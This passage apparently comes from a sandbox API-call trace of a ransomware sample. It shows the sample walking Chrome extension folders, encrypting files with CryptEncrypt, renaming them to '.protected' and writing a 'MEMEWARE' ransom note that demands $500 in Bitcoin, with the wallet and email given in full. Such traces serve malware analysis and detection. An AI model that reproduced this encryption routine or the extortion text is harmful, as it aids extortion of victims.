(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.919] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.919] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.920] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.920] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.920] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.920] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.920] CloseHandle (hObject=0x164) returned 1 [0079.921] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.921] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW") returned 146 [0079.921] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.921] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*") returned 148 [0079.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.921] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\.") returned 148 [0079.921] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.921] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\..") returned 149 [0079.921] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.921] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.921] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.921] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.921] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.922] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.922] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.922] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json") returned 160 [0079.922] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.922] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.923] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.923] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.923] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.923] CloseHandle (hObject=0x168) returned 1 [0079.923] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.protected") returned 170 [0079.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.924] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.924] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.924] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 164 [0079.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.924] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.924] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.925] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.925] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.925] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.925] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.925] CloseHandle (hObject=0x164) returned 1 [0079.925] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.925] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.925] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\RESTORE_FILES.txt") returned 158 [0079.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.925] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.925] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.926] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.926] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.926] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.926] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.926] CloseHandle (hObject=0x160) returned 1 [0079.926] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.926] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.926] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata") returned 141 [0079.927] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.927] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*") returned 143 [0079.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\.") returned 143 [0079.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.927] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\..") returned 144 [0079.927] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.927] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json") returned 164 [0079.927] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.927] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.927] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.927] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.928] 